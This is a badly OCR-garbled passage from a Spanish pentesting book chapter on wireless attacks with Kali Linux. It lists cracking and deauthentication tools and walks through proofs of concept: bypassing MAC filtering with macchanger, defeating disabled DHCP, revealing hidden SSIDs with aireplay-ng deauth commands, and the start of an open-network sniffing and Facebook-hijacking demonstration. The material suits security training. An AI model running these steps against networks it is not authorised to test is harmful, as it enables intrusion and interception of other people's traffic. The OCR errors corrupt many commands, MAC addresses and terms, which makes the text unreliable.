La  tecnologia  NFC,  Near  Field  Communication,  permite  las  cornimicaciones  inalambricas  de  eorto 
alcance  y  frecuencia  alta.  Se  puede  realizar  intercambio  de  datos  entre  dispositivos.  Las  herramientas 
para  NFC  son  las  siguientes: 

Mfcuk .  j 

-  Mfoc* 

Mi/are-class  ic-format 


-  Nfe-list. 

-  Nfc  mfi  lassie. 


1 1 

Por  ultimo,  se  hablara  de  las  herramienias  de  Wireless  que  se  incluyen  en  Kali  Linux*  Ademas, _ 
res  to  del  capftulo  se  detallaran  pruebas  de  concepto  del  uso  de  las  heiraniientas  mas  interesan  e  V 
la  realization  de  auditorial  Wireless. 


Capitulo  VT.  Ataques  Wireless 
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pefiniciones 

En  este  apartado  se  explicarin  deltas  definiciones  importantes  para  el  desarrollo  del  capitulo,  y  que 
dcbea  ser  conocidas  por  ios  usuarios  o pentesters* 

SSID 

un  norrtbre  inclutdo  en  todos  Ios  paqueles  de  una  red  inal&mbrica  para  ident iricaiios  como 
parte  de  esa  red,  El  cddigo  const  ste  en  un  maximo  de  32  caracteres  que  la  mayoria  de  las  veces 
son  alfamimericos,  Todos  Ios  dispositivos  inalambricos  que  intentan  comunicarse  entre  si  deben 
comparer  el  mismo  SSID, 

BSSID  y  Station 

El  bssidc s  !a  direecion  fisiea  del  punto  de  acceso  y  la  station  es  un  cliente  asociado  a  un  punto  de 
aeceso, 

PSK,  TKIP,  AES,  EAP 

PSK,  P reShared  Key  es  una  clave  compartida  entre  un  punto  de  acceso  y  un  cliente,  Son 
vulnerables  a  mas  acciones,  sobre  todo  a  ataques  de  diceionario. 

-  TKIP,  Temporal  Key  Integrity  Protocol,  es  un  algoritmo  de  cifrado  de  datos  utilizado  en 
WPA. 

-  AES,  Advanced  Encryption  Standard ,  es  un  algoritmo  de  cifrado  de  datos  utilizado  en 
WPA2, 

i  -  EAP,  Extensible  Authentication  Protocol  ^  protocolo  para  el  mtercambio  dc  mensajcs 
durante  el  proceso  de  autenticacion* 


2.  Herramientas  Wireless  en  Kali 

Las  herramientas  Wireless  disponibles  en  Kali  Linux  son  las  siguicntes: 

Suite  air*.  Las  numerosas  herramientas  del  prefijo  air  como  son  at  rc  rack,  at  replay,  airman, 
airdecap.  airbase,  etcetera.  Estas  herramientas  permiten  cambiar  el  modo  de  trabajo  del 
adaptador  inalambrico,  reinyectar  paquetes,  desautenticar  clientes  con  el  punto  de  acceso, 
descifrar  Ir&fico,  eonfigurar  puntos  de  aeceso  y  numerosas  funciones  mas. 

As  leap,  Es  una  herramienta  diseftada  para  crackear  contraseflas  de  Ios  protocolos  LEAP  y 
PPTP.  Esta  aplicacion  puede  realizar  la  recuperacidn  de  las  contraserlas  sobre  capturas  en 
vivooen  archives  PCAR  Adem&s,  puede  llevara  caho  ladesautentieacibn  de  clientes  en  un 
adaptador  WLAN,  Su  funcionalidad  mas  utilizada  es  la  de  la  recuperacidn  de  contrasefias 
PPTP  en  VPN, 

Cow  patty.  Esta  aplicacion  permite  realizar  fuer/a  bruia  o  ataques  de  diceionario  sobre  el 
protocolo  WPA  y  WPA2, 
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EapmdSpass.  Esta  herramienta  permite  realizar  un  ataque  de  diccionario  contra  EAP-MD5. 
Sc  necesita  una  eaptura  con  la  autenticacidn  cn  un  Ibrmato  PC'AP,  basiante  Upico  cuando 
se  audita  Wireless.  ™ 

Fern-wifi-cracker.  Permit©  auditar  y  recuperar  las  claves  WEP/W PA/WPS  y  ejecutar 
alaques  basados  en  Wireless  o  ethemet.  Propore  kma  una  GUI  may  intuitiva  para  llevar  a 
cabo  el  proeeso  dc  auditoria.  Una  herramienta  muy  interesante  que  lacilita  mucho  el  trabajo 
basico  de  auditoria  Wireless. 

Genkeys.  Generador  de  claves  para  asleap, 

Genpmk,  Esta  herramienta  es  utilizada  para  crear  archivos  con  hashes  de  manera  similar 
a  como  sc  realiza  en  una  rainbow  table.  En  WPA  el  SSID  es  utilizado  en  el  salt  para  crear 
el  trash,  por  lo  que  es  algo  que  hay  que  tener  en  cuenta.  Hay  que  crear  un  fichero  por  cada 
SSlD,  M 

GiskismeL  Esia  herramienta  pemiite  realizar  busquedas  e  inserciones  en  ficheros  KM L,  Se 
puede  utilizar  para  crear  una  base  de  datos  con  informacion  geografica  de  puntos  de  aeceso 
abiertos  y  mostrarlos  en  un  mapa. 

Kismet.  Esta  aplicaeion  es  un  sniffer f  detector  de  redes  Wireless  que  trabaja  en  eapa  2  en  d 
protooolo  802. 1 1 .  Kismet  trabaja  con  cualquier  tarjeta  que  soporte  modo  monitor  y  pueda 
sniffar  trAfico  de  tipo  802, 1 1  b,  802. 1  la,  802.11  g  y  802, \  1  n,  j 

Md k3,  Esta  herramienta  permite  jugar  eon  ei  SSIU  de  los  puntos  de  aeceso,  incluso 
provocando  la  desaute  nticacion  de  los  clientes  legitimos  de  un  punto  de  acceso.  Otra  de 
sus  funcionalidades  es  la  de  realizar  fuerza  bruta  contra  el  nombre  de  la  red  Wireless, 
Ademds,  permite  crear  un  numero  alio  de  SSID,  gracias  a  los  beacons  ^  falsos  cuya  funcion 
es  molestar  a  los  usuarios  legitimos. 

Wifite.  Esta  aplicaeion  permite  auditar  redes  Wireless  de  manera  sencilla  e  intuitiva, 
gracias  a  su  menu  principal,  La  aplicaeion  es  de  terminal,  pero  su  menu  mediante  updone* 
deja  bastante  claro  que  acciones  se  pueden  realizar.  Por  debajo  utiliza  las  herramientas 
tipicas,  pero  gracias  a  su  presentacion  no  se  necesita  tener  conocimientos  de  lo  que  se  esta 
llevando  a  cabo.  Recomendable  su  uso  en  casos  parlieu lares,  ya  que  simplifica  mucho  la 
configuration  de  las  herramientas. 

Reaver .  Esta  aplicaeion  permite  realizar  un  ataque  de  fuerza  brutal  contra  WPS,  Wi-Fi 
Protected  Setup.  La  aplicaeion  realiza  el  ataque  contra  el  PIN  de  WPS,  consiguiendo 
recuperar  e]  pass  phrase  de  WPA/WPA2, 

Herramientas  de  prefijo  zb  como  pueden  ser  por  ejemplo  zbstumblen  zbdsnijf.  zbreplay- 
etcetera, 

Requisitos 

El  mayor  de  los  requisitos  es  que  el  chipset  del  adaptador  Wireless  debe  poder  configurarse  en 
modo  monitor.  Es  importante  no  confundir  el  modo  monitor  con  el  modo  promiscuo  de  la  tarjeta 
inalambrica. 
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El  modo  monitor  captura  todo  el  trafico  que  circuit  un  el  radio  de  accion  del  adaptador, 
jndependientemente  de  la  red  por  la  que  viaje,  Se  puede  entendei  come  que  el  modo  monitor  captura 
todo  el  trafico  del  aire.  El  modo  promiscuo  se  configura  cuando  el  adaptador  se  encuentra  ssociado 
a  una  red  Wireless  y  se  captura  todo  et  trafico  de  dicha  red. 

1  xisten  cicrtos  sitios  web  que  comunican  al  usuario  3a  compatibilidad  de  su  chipset  eon  el  modo 
monitor  del  adaptador  inalAmbrico,  Por  ejemplo,  la  siguiente  URL  h ftp://! inux-wiess.passys. nl 
realizara  una  serie  de  pregimtas  para  poder  verilicar  la  compatibilidad  del  chipset  con  el  modo 
monitor. 


La  suite  air* 

La  suite  de  herramientas  air  proporciona  todo  lo  necesario  para  llevar  a  cabo  una  auditoria  a  redes 
Wireless  en  Kali .  Existen  otras  herramientas.  como  son  GUIs  o  scripts,  que  utilizan  por  debajo  a  las 
propias  herramientas  de  la  suite,  A  continuation  se  presema  un  listado  detallado  de  las  herramientas 
air *: 


-  A irmon-ng,  Gambia  el  modo  de  trabajo  de  la  tarjeta  inalambrica,  siempre  y  cuando  el 
chipset  lo  permits,  El  modo  de  trabajo  pasa  a  ser  de  lipo  monitor. 


-  Airodump-ng .  Esta  aplieacion  eseueha  o  smjfa  todo  lo  que  eireula  por  el  aire, 
mdependicnlemente  de  su  cifrado,  su  red.  etcetera.  Logieamenle  si  el  trafico  va  sin  cifrar, 
es  decir  redes  abiertas,  se  puede  visual  izar  dicho  trafico  y  se  podria  capturar  infonnaeion 
sensible  que  eireula  por  el  medio  de  transmision,  el  aire.  Mas  adelante  se  detalla  el  uso  de  la 
aplieacion. 


-  Airhase-ng.  Esta  herramienta  permite  a  un  usuario  atacar  a  los  clientes  asociados  a 
un  punto  de  acceso.  Es  una  aplieacion  vcrsatil  y  flexible,  disponiendo  de  distintos  modes 
de  trabajo.  Otra  opcion  interesante  que  aporta  airhase-ng  es  la  de  habilitar  el  adaptador 
inalambrico  como  si  fuera  un  punlo  de  acceso  normal.  De  este  modo,  se  podria  enganar  a  un 
usuario  para  que  se  conectase  al  punto  de  acceso  fa  Iso  y  capturar  de  manera  sencilla  todo  su 
trafico. 


Aircrack-ng,  Esta  herramienta  permite  realizar  ataques  de  fuerza  bmta,  diccionario  o 
estadisticos  a  capturas  de  trafico  Wireless,  En  funcion  del  tipn  de  cifrado  de  la  red  que  se 
quiera  crackear  se  realizara  un  tipo  de  afcaqtie  u  otro, 

-  Airdecap-ng,  Permite  descifrar  capturas  de  cifrado  WEP  y  WPA.  siempre  y  cuando  se 
disponga  de  la  clave  de  la  red,  El  resultado  de  la  operacidn  es  un  fichero  C  AP  con  el  trifico 
que  estaba  protegido  por  el  cifrado  totalmenle  visible  y  accesible. 

-  Airdecloak-ng.  Esta  herramienta  permite  al  usuario  eliminar  los  paquetes  de  WEP 
cloacking  de  la  captura  de  trafico  obtenida.  Algunos  pantos  dc  acceso  insertan  frames  WEP 
falsos  para  contaminar  las  posibles  capturas  de  trafico  y  que  el  ataque  estadfstico  no  funcione 
correc  tame  rite.  Interesante  herramienta  si  sc  observa  que  se  tarda  demasiado  en  crackear 
WEP. 
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-  Airdriver-ng.  Esta  herramienta  proporciona  information  sob  re  los  drivers  del  sistema  en 

lo  que  a  Wireless  se  refiere.  AdemAs.  proporciona  [a  posibilidad  de  eargar  drivers  e  instakir  v 
desinstalar  estos  con  los  parches  necesarios  para  los  modus  monitor  e  inyeccion,  J 

-  Aireplay-ng.  Permile  realizar  operaciones  o  ataques  sobre  los  puntos  de  aceeso  y  dicntes 
asociados  a  esios.  Mas  adelante  se  detallan  las  posibilidades  de  esta  aplicacion  quc  realiza  las 
funciones  de  navaja  suiza  en  los  ataques  Wireless* 

-  Airoiib-tig.  Esta  herramienta  permite  almacenar  y  manejar  listas  de  ESSID  y  contrasefias, 
calcular  las  PMKs,  Pairwise  Master  Keys  y  usarlas  para  crack  ear  WPA/WPA2.  La  aplicacion 
utiliza  una  base  de  datos  de  poco  peso,  como  es  SQLiteS.  Crackear  WPA/WPA2  supone 
calcular  la  PMK  que  se  deriva  de  la  PTK,  Private  Transient  Key .  El  caiculo  de  ta  PMK  es 
un  proceso  lento  ya  que  utiliza  PBKJDF2  como  algoritmo,  pero  la  PMK  es  siempre  la  misnia 
para  un  ESSID  y  conirasena  concreta,  es  decir,  se  puede  pre  calcular  la  PMK  para  conseguir 
ciertas  combinaciones  y  acelerar  la  ohteneion  de  la  clave  WPA/WPA2.  La  experiencia  dice 
que  se  pueden  comprobar  mas  de  30,000  contrasefias  por  segundo  con  este  metodo. 

Airserv-ng,  Es  un  servidor  para  tarjetas  Wireless,  el  cual  permite  multiples  aplicaeiones  y 
usar  aplicaeiones  independientemente  de  la  larjeta  o  driven  Todos  los  drivers  se  encuentran 
incorporados  en  el  servidor  por  io  que  se  elimina  la  necesidad  dc  que  cada  aplicacion  contenga 
datos  y  drivers.  Cuando  un  usuario  utilice  la  suite aircracK  en  lugar  de  especificar  la  interfaz, 
sc  cspecilicara  la  direccidn  IP  del  servidor  y  el  puerto  de  este. 

-  Airtun-ng.  Esta  herramienta  permite  crear  interfaces  virtu  ales  denominadas  tunnel 
interface.  Sus  funciones  principales  son  la  monitorizacion  de  trafico  cifrado  con  proposito 
de  W1DS*  Wireless  intrusion  Detection  System ,  y  la  dc  inyectar  trafico  de  forma  arbitraria  en 
una  red* 

Airodump-ng 

Es  una  de  las  herramientas  eslrellas  de  la  suite  y  mas  eonoeidas,  Permite  al  usuario  escuchar  lodo  el 

trafico  que  circula  por  cl  aire.  ayudandose  de  la  interfaz  inalamhrica  trabajando  en  modo  monitor. 


En  este  apartado  se  detallan  los  parametros  que  se  pueden  visualizar  en  una  captura  de  trafico 
con  airodump-ng  r  ya  que  se  entiende  quc  puede  ser  costoso  para  un  usuario  interpretar  toda  la 
information  quc  la  aplicacion  muestra  por  pamalla. 
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Imagcn  06.01:  Captura  de  trafi co  uon  airodump-ng  (Parte  1 ). 
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imagcn  06*0 1 :  C aptura  de  iriJi&n  con  airodump-ng  (Parte  2). 


En  la  siguiente  tabla  se  resumen  los  parametros  que  se  pueden  visualizar  en  la  imagen  de  airodump- 
ng.  Es  importante  extender  el  funciouamientd  y  el  significado  de  todos  los  detalles  que  proporciona 
la  aplicarion* 


Para  metro 

Descripcidn 

Bssid 

ldentifica  la  direccion  MAC  de  un  punto  de  acceso. 

PWR 

Intensidad  de  la  serial  El  significado  depende  del  controlador,  en  algunos  modelos 
cuanto  mas  cerca  del  0  mayor  nivel  y  en  otros  cuanto  mas  cerca  del  100  mejor  nivel 
de  serial 

Beacons 

Numero  de  balizas  o  paquetes  anuncio  enviados  por  el  AP 

Data 

Numero  de  paquetes  de  datos*  En  WEP  solo  cueman  los  I  VS* 

Ws 

Numero  do  paquetes  de  datos  por  segundo. 

CH 

Canal. 

MB 

Veloddad  minima  soportada  por  el  AP 

ENC 

Algoritmo  de  cifrado  en  uso  por  el  AP.  Puede  ser  OPN,  WEP,  WPA  o  WPA2. 

CIPHER 

Tipo  de  cifrado  de  datos,  Puede  set  WEP,  TKIP  (WPA)  o  CCMP  ( WPA2). 

A  UTH 

Melodo  de  autenticadon*  General  mente  suek  visualizarse  PSK  en  entornos  de 
clave  compartida. 

ESSID 

Nombre  de  la  red  Wireless* 

Station 

- ■  - a 

Direccion  MAC  de  un  cliente  asociado  a  un  AR 

Probe 

Son  paquetes  en  los  que  un  cliente  inienta  identificar  una  red  Wireless,  Por  lo  que 
se  puede  obteuer  el  nombre  de  redes  que  un  cliente  esta  buscando  e  inienta  verificar 
que  sc  encuentran  en  su  radio  de  aecion. 

Tabla  06*0  E :  Resumen  y  deseripcidn  de  \m  parametros  que  se  pueden  visual  i/aren  la  imagen  de  ai/vciump-ng. 


Aireplay-ng 

Esta  herramienia  permite  reaiizar  diversos  ataques  sobre  puntos  de  acceso  y  clientes  asodados.  Es 
eonocida  como  una  navaja  suiza  por  su  diversidad  en  Ins  ataques  tal  y  eomo  se  puede  visualizar  en 
imagen  eorrespondiente. 
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Attack  modes  < numbers  can- stilt  be  usedh 

’-deaiith  count  :  dciuthenticil*  1  or  ill  stations  l-O) 

•-ftlcttufRi 

delay  :  fake  authentication  with  AP 

(-1) 

-*int«ractiv« 

i  interactive  frame  selection 

•-irprtpliy 

:  standard  ARP- request  replay 

(-3) 

- -chopchop 

;  dicrypl/chopchop  WEP  pack*! 

(«4) 

--f  raqMnt 

i  generates  valid  keystream 

t-5) 

:  query  a  client  for  new  IVs 

t  -6) 

“tfrag 

:  fragments  against  a  client 

(-71 

-  -iignoile 

:  attacks  MPA  migration  mode 

(-8) 

:  tests  injection  and  quality 

(-9) 

--help 

;  Displays  this  usage  screen 

Imager  06.02:  Gpciones  de  aireplay-ng. 


Muchos  usuarios  ven  en  el  uso  de  csta  aplicacion  una  dificultad  que  no  es  real,  ya  que  si  se  disponen 
de  I  os  conocimientos  sobre  lo  que  es  cada  ataque,  el  uso  de  la  aplicacion  es  bastanle  sencillo.  En 
la  siguiente  labia  se  pueden  visualizar  los  distintos  tipos  de  opciones  o  ataques  que  presenta  la 
aplicacion. 


Ataque 

Description 

-0  Desau  tenticacidn 

Estc  ataque  permite  al  atacanie  desautenticar  a  uno  o  varios  dientes 
de  un  punio  de  accesa.  I 

-J  Auienticacidn  falsa 

Este  ataque  perm  tic  asociarse  a  un  punto  de  acceso,  siempre  y 
cuando  el  AP  lo  permits.  ,  | 

-2  Selection  interactive 

Este  alaque  permite  elegir  un  paquete  y  recnviarlo.  Pucde  dar 
mejores  resultados  que  el  alaque  3. 

-3  Reinyeccion  de  paquetes 

Este  ataque  permite  capturar  un  paquete  ARP  y  reinyectarlo  contra 
el  AP,  generando  gran  volumen  de  trafico.  \ 

-4  Ataque  Chop  Chop 

Hste  ataque  no  recupera  la  clave  WEP  en  si  misma,  sine  que  revela 
meramente  el  texto  piano,  _ 

-5  Fragmentation 

Este  ataque  intenta  generar  una  key  stream.  _ :_v 

-6  Caffe-Latte 

Los  clientes  asoeiados  seran  quienes  aporien  mas  1  Vs  para  crackear 
la  red.  _ j 

Tabla  06.02:  Resumen  y  deseripcion  de  los  lipos  de  Plaques  en  at  replay, 


Evasion  de  eonfiguraciones  bisicas  de  seguridad 

Existen  eonfiguraciones  muy  basicas  de  seguridad  para  los  puntos  de  aeceso.  En  muchos  ambitos,  v 
mi  sector  de  los  profesionales  de  la  seguridad,  no  se  consideran  eonfiguraciones  de  seguridad,  Pero 
si  aportan  una  pequena  capa,  la  dial  habria  que  evadir,  Por  esta  razon,  en  el  instanie  que  hay  qLlC 
evadir  una  capa  de  seguridad,  por  muy  pequena  que  sea,  se  esta  hablando  de  configuracion  basica  de 
seguridad,  A  continuaeion  se  enumeran  las  ties  eonfiguraciones  basicas  de  seguridad: 


Cap  'itulo  VI.  A  tuques  Wireless 
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Filtrado  de  directories  MAC. 

-  D  H  C  P  desacti  vado  o  emSneo. 

E  -  SSIDOeulto, 

E  l  filtrado  de  direceiones  MAC  permite  autenticarse  en  la  red  solo  con  un  conjunto  de  direceiones 
MAC  valido.  Para  sal  tar  esta  proteccidn,  sencillamente  habra  que  realizar  MAC  Spoofings  es  dedr, 
suplantar  la  direction  MAC  de  un  cliente  que  tcnga  acceso  a  !a  red.  El  proceso  se  puede  ejemplificar 
de  la  siguiente  manera: 

-  Con  la  herramienta  attvdump-ng y  el  adaptador  en  raodo  monitor  se  pueden  visual izar  los 
clientes  asociados  a  un  punto  de  acceso. 

Si  no  hay  un  cliente  asociado  al  pimio  de  acceso*  se  dehera  esperar  a  que  esta  situation 
se  concrete. 

Una  vcz  que  se  dispone  de  una  direccion  MAC  valida,  se  debe  eambiar  mediante  el  liso 
de  la  herramienta  macchanger, 

ft  Se  ha  conseguido  real  izar  un  Bypass  del  filtrado  de  direceiones  MAC  en  un  punto  de 

aeceso. 

La  restrict  i6n  DHCP  puede  eritenderse  de  varias  maneras,  La  primers  es  que  el  servidor  DHCP 
de  la  red  Wireless  a  la  que  se  accede  no  aporta  direceiones  IP  de  manera  dinAmica.  La  segunda  cs 
que  el  servidor  DHCP  distribuye  un  range  de  red  errbneo,  ;,Con  que  fin?  (onfundir  al  intruso  y  no 
conseguir  conectividad  con  maquinas  de  la  WLAN,  mi  sal ida  a  Internet. 

Si  cl  servidor  DHCPse  encuentra  deshabilitado  saltarse  la  restriccidn  cs  tan  sencillocomo  configurar 
la  direccion  IP,  DNS  y  puerta  de  enlace  manuaimente,  ^Como  sabemos  el  rango  de  la  red?  Si  existe 
un  cliente  asociado  a  la  red  se  col  oca  un  sniffer,  o  incluso  con  alrodump-ng.  y  se  captura  el  trafico 
de  la  red  obteniendo  la  direccion  IP  del  cliente  asociado.  Si  no  existe  un  cliente  asociado  a  la  red.  se 
podria  hacer  un  escaneo  ARP  a  ranges  de  red  locales  para  ver  al  router  v  encontrar  el  posible  rango, 
Otra  posibilidad  es  esperar  a  que  ios  paquetes  multicast  aparezean.  que  seguro  que  ocurre,  y  obtener 
una  direction  IP  valida. 

Si  el  servidor  DHCP  reparte  direceiones  IP  falsas,  es  deeir,  de  un  rango  errdneo  al  de  la  red,  el 
usuario  notara  que  no  cncuenlra  equipos  en  esc  segmento  ni  puede  navegar  a  traves  de  Internet.  Se 
podria  uti  I  izar  el  procedimieftto  descrito  para  cuando  el  servidor  D!  1CP  se  emeuentra  deshabilitado, 
y  de  esta  forma  obtener  el  rango  cor  recto. 

La  restriccidn  del  SSID  consiste  en  ocultar  el  nombre  de  la  red,  lo  cual  provoca  que  m  cliente  deha 
introducir  el  nombre  de  la  red  inalimbrica  a  la  que  se  quiere  conectar  Existen  varias  posibilidades 
para  obtener  el  SSID  de  la  red,  si  existe  un  cliente  asociado  a  la  red  Wireless,  se  puede  provocar 
Mediante  aireplay-ng  la  desaute nlicacidn  del  punto  de  acceso  y  conseguir  que  el  cliente  se  vuelva  a 
autenticar  enviando  un  paquete  Probe  con  el  nombre  dc  la  red.  Si  no  existe  ningun  cliente  asociado 
punto  de  acceso  se  debera  esperar  a  que  se  autemique  un  cliente,  o  bient  real  izar  fuerza  bruta  con 


la  aplicacion  mdk3.  Para  nombrcs  de  red  menores  de  5  o  6  caracteres  la  fuerza  bruta  puede  >ei  un,, 
solution,  para  nombres  de  mayor  longitud  no  es  una  bucna  opcion.  T| 

I 

Proof  Of  Concept:  Bypass  MAC  +  Bypass  DHCP+  SS1D  Oculto 

En  esta  pmeba  de  concepto  se  presents  el  siguiente  eseenario: 

-  Un  pun  to  de  acceso  que  tiene  configurado  el  acceso  solo  para  clientes  con  direccion  Mac 
CA:FE:CA;FE:CA:FE  y  00: 1  C;BF:4D:0B:BG. 

-  Un  punto  de  acceso  con  DHCP  deshabilitado. 

-  El  SSID  de  la  red  oculto.  J 

-  Un  cliente  asociado  a  la  red, 

El  atacanie  dispone  de  la  contrasena  de  la  red  Wireless  o  csta  se  encuentra  abierta.  es 
decir,  sin  cifrado  en  el  trafico  de  paquetes  por  el  medio  de  transmision.  « 

^Cdmo  evadir  estas  reside  ciones?  Como  se  vera  a  conti nuac ion,  con  Kali  Linux ;  y  otras  inuchas 
distribudones  de  seguridad,  es  realm ente  sencillo  evadir  estas  medidas  basicas  de  seguridad  Wireless, 

En  primer  lugar  se  debe  configurer  la  tarjeta  en  modo  monitor  mediante  la  instruccidn  airman- ng 
start  <  interfaz  wlan>.  Una  vez  hecho  esto  la  tarjeta  podra  escuchar  todo  lo  que  drcnle  por  el  a  ire. 

Con  airodump-ng  se  puede  visualizar  el  estado  a6reo  alrededor  del  equipo.  En  la  imagen  se  visimliza 
coma  existe  una  red  con  SSID  oculto,  de  longitud  4,  la  eual  ticne  asociado  un  equipo  cliente.  <  iracius 
a  fete  se  podra  obtener  el  nombre  de  la  red  real,  para  elio  se  cjecuta  el  ataque  de  desaiilenlicacion  de 
aireplay-ng  -0  5— a  < direccion  MAC  AP>  -c  <direccidn  MAC  client  e>  motif)* 
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Imagen  06.03:  Red  deteciada  con  SSID  oculto. 


Eras  realizar  dicha  accion  el  cliente  volvera  a  autenticarse  con  el  punto  de  acceso  v  se  obtendni  cl 
paquete  con  el  nombre  de  la  red.  que  viajara  desde  el  cliente  hacia  el  punto  de  acceso.  Con  csta 
accion  sc  realiza  el  Bypass  del  SSID  oculto,  siempre  y  cuando  haya  un  cliente  asociado  a  la  red.  Si 
mo  hub  tent  un  cliente  asociado  a  la  red  se  puede  recurrir  a  la  fuerza  bruta  con  la  aplicacion  mdk3. 


Images  06.04:  Obtcnckm  del  SSID  oculto, 


Capituh  VL  Ataques  Wireless 


edemas,  si  se  incluye  e]  para  metro  -vc  en  la  ejecueion  de  airodump-ng  sc  vuelea  en  un  fichero  CAP 
RH|0  el  trafico  que  circulaba  por  el  at  re,  Este  heeho  ayuda,  y  macho,  si  se  quiere  obtener  un  range  de 
directories  IP  valida,  ya  que  el  servidor  DHCP  se  encuentra  deshabilitado. 

gn  ia  imagen  sc  puede  visualizar  como  el  diente  asociado  al  punto  de  acceso  ha  estado  realizado 
peticiones  multicast  a  ciertos  servicios,  e  induso  puede  haber  uavegado  a  traves  de  Internet,  euya 
accidn  se  vena  en  texto  piano  si  el  protocolo  as!  estuviera  constmido.  En  definitiva,  es  muy  facil 
reallzar  un  Bypass  del  servidor  DHCP. 
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Imagen  06.05:  Qbtencion  del  tango  de  direcc  tones  IP  valido. 


Por  ultimo  queda  real i Ear  el  Bypass  del  fihrado  MAC.  para  lo  eual  se  observa  con  airodump-ng 
yna  direccion  MAC  asociada  a!  punto  de  acceso  concrete.  Con  la  apHcacion  macchanger  se  puede 
realizar  el  cambio  en  el  adaptador  y  de  esta  manera  no  ser  filtrado  por  el  punto  de  acceso.  En  las 
indigenes  se  puede  visualizar  como  se  realiza  el  cambio  y  como  al  listar  las  interfaces  de  red  se 
puede  comprobar  que  los  cambios  ban  surgido  efeclo. 


raotfikaU :  ifconflg  wlan0  down 

rootftkali:  macchanger  - -mac=0G : 1c :bf : 4d :9b:b9  wlanG 

Permanent  MAC:  00  :22:b0  :71 :la:aG  (0-link  Corporation) 
Current  MAC  :  GO  :22  :bQ  :71 :1a  ;aG  (D-linlj  Corporation) 
New  MAC:  0G :1c :bf :4d :0b :b0  (Intel  Corporate) 

root@kali ifeonfig  wlanG  up 

Imagen  06.06:  Cambio  de  direccion  MAC  en  el  adaptador  Wireless. 


wlanS  Link  encap : Ethernet  HWaddr  GG : lc :bf :4d : Gb :bfl 
UP  BROADCAST  MULTICAST  KTU:15G0  Metric:! 

RX  packets  :0  errors:0  dropped:®  overruns :G  frame:0 
TX  packets  :0  errors:0  dropped:®  overruns :0  cameriO 
collisions :0  tKqueuelen : 1000 
RX  bytes :0  (0.0  BJ  TX  bytes:0  (6.0  0) 

Imagen  06,07:  Direccion  M  AC  motiificada. 


6aptura  e  interpretation  de  trafico  abierto 

Us  redes  abiertas,  se  identifican  en  airodump-ng  mediante  la  nomenclatura  OPN.  son  peligrosas 
Para  la  privaetdad  c  mtegridad  de  los  datos  que  transmiten  los  usuarios.  Este  tipo  de  redes  Wireless 
co  loan  i  la  inform  aci6n  en  el  medio  de  transmision  sin  n  ingun  a  eapa  que  ias  proteja,  por  lo  que 
Cl)alquier  usuario  eon  una  taijeta  en  mode  monitor  puededeer  dicha  informacidn,  Hay  que  terser  en 
Ctk'nta  que  si  el  tralico  es,  por  ejemplo,  HTTPS  es  este  protocolo  quien  protege  la  informacion,  pero 

f1  ^1  trafico  es  HTTP,  cualquier  usuario  sin  asociarse  a  ese  punto  de  acceso  podria  capturar  dicha 

,nfQnnaci6n4 
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Este  tipo  de  redes  sc  encuentran  en  muehos  lucres  hoy  en  dia,  como  pueden  scr  centros  comerdales 
univcrsidades.  redes  de  invitados  de  empresas.  Es  cn  esta  ultima  en  las  que  se  protege  la  salida  a 
Internet  pero  no  cl  cifrado  con  el  que  los  paquetes  circulan  por  e!  aire,  Por  esta  razon,  el  primer 
ataque  que  se  debe  contemplar  en  temas  Wireless  cs  el  de  la  red  abierta. 

lil  prooedimiento  para  realizar  una  captura  de  tr&fico  de  una  red  abierta  es  el  siguiente: 

Tatjeta  H  ireless  en  modo  monitor  para  capturar  todo  tipo  de  trifico  quo  circule  por  el  aire 
mediante  el  uso  de  la  herramienta  airmpn-ng, 

-  Mediante  el  uso  de  la  herramienta  airodump-ng  se  pueden  “atrapar”  todos  esos  paquetes 
que  circulan  en  el  aire,  visualizar  direcciones  MAC  de  los  puntos  de  acceso,  ver  maqujnas 
asociadas  a  dichos  puntos,  ver  a  que  redes  Wireless  se  conectan  habitualmente  los  clientes 
aunque  la  red  no  se  eneuentre  en  d  presente  entorno  fisico,  ealidad  de  3a  senal,  etcetera. 
Ademas,  esta  herramienta  permile  volcar  a  un  fichero  de  tipo  CAP  el  trafico  capturado,  para 
que  pueda  ser  visualizado  y  analizado  con  herramientas  como  Wires  hark.  Network  Miner . 
etcetera. 

-  Una  vez  que  se  obtiene  esta  informacidn  en  un  CAP  solo  hay  que  ir  filtrando  y  obteniendo 
los  dates  de  interns. 

Proof  Of  Concept:  MITM  en  el  aire  e  Hijacking  de  Facehoek 

Ei  escenario  de  esta  pmeba  de  concepto  es  el  siguiente:  M 

El  punto  de  acceso  no  ci f  ra  los  paquetes  en  d  aire  con  los  clientes  asociados. 

Ex  isle  un  cliente  asociado  al  punto  de  acceso. 

El  cliente  esta  visttando  una  faniosa  pagina  de  una  red  social  a  nivd  mundial. 


Como  se  ha  mencionado  anteriormente,  el  ataeante  puede  esctichar  el  aire  obteniendo  Lodo  el  trafico 
que  circula  por  el.  En  primer  lugar,  el  atacante  colocara  su  tarjeta  Wireless  en  modo  monitor  en  Kali 
Linux. 


r  oatpfcal  i  a:  rmori  ng  start  wlanS 


=oumJ  3  processes  that  could  csljs*?  trouble. 

1+  airoduno-ng,  a  1  replay  ng  or  airtun-ng  steps  working  after 
a  snort  period  of  time,  you  nay  want  to  kill  [some  of)  them! 
-e 

3ID  Name 

20SS  Net  wo  rk Manage  r 

2 IBS  wpa  supplicant 

?955  tJhcUent 


Interface  Chipset  Driver 

rflanD  (UUflk  25?  3  U50  rt73usb  IphyO] 

_ (man  it  Or  mark-  enabled  or  monQ) 

[magen  06.08:  Configuracidn  dc  tarjeta  Hireiesx  en  modo  monitor. 


A  conti nuacidn,  y  por  lo  general,  se  arranca  airodutnp-ng  con  la  siguiente  instruction  airodnmp^E 
monO.  Esta  action  hara  que  la  herramienta  vaya  saltando  de  canal  capturando  el  trafico  de  todos 
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ellos,  pero  de  este  modo  se  pueden  perder  paquetes  importantes  que  csian  en  un  canal  en  concrete 
lmi  cierto  instanle, 

Los  resullados  de  la  ejecucion  de  airodump-ng  se  pueden  visualizar  en  la  imagen,  domic  llama  la 
atencidn  que  existe  una  red  con  dfrado  OPN,  es  dedr,  de  lipo  abierto.  Ademas,  en  la  parte  inferior 
se  puede  visualizar  que  exisle  un  cliente  asociado  a  dicho  punto  de  aceeso,  por  lo  que  seguramente 
se  este  generaiido  t  ration  entre  am  bos. 
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Imagen  06,09:  DescubrimicMo  dc  la  red  Liberia 


Una  vez  dctectado  esle  tipo  de  redes  y  de  entender  todos  los  para  metros  que  arroja  airodump-ng , 
se  va  a  filtrar  la  inlbrmaci6n  mediante  el  uso  de  ciertos  parametros.  La  insmiccidn  a  ejecutar  es 
